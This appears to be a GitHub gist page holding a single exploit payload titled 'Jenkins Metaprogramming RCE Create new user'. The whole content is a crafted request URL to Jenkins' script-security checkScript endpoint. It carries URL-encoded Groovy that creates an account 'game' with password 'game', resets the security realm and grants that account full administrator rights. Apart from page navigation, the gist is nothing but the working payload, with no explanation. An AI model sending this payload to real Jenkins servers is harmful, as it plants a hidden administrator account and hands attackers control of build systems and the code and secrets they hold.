Skip to content

Instantly share code, notes, and snippets.

@smiegles
Forked from akhil-reni/payload
Created July 26, 2019 15:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save smiegles/7179ac624a15cb3f5a28b742fa8062ed to your computer and use it in GitHub Desktop.
Save smiegles/7179ac624a15cb3f5a28b742fa8062ed to your computer and use it in GitHub Desktop.
Jenkins Metaprogramming RCE Create new user
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment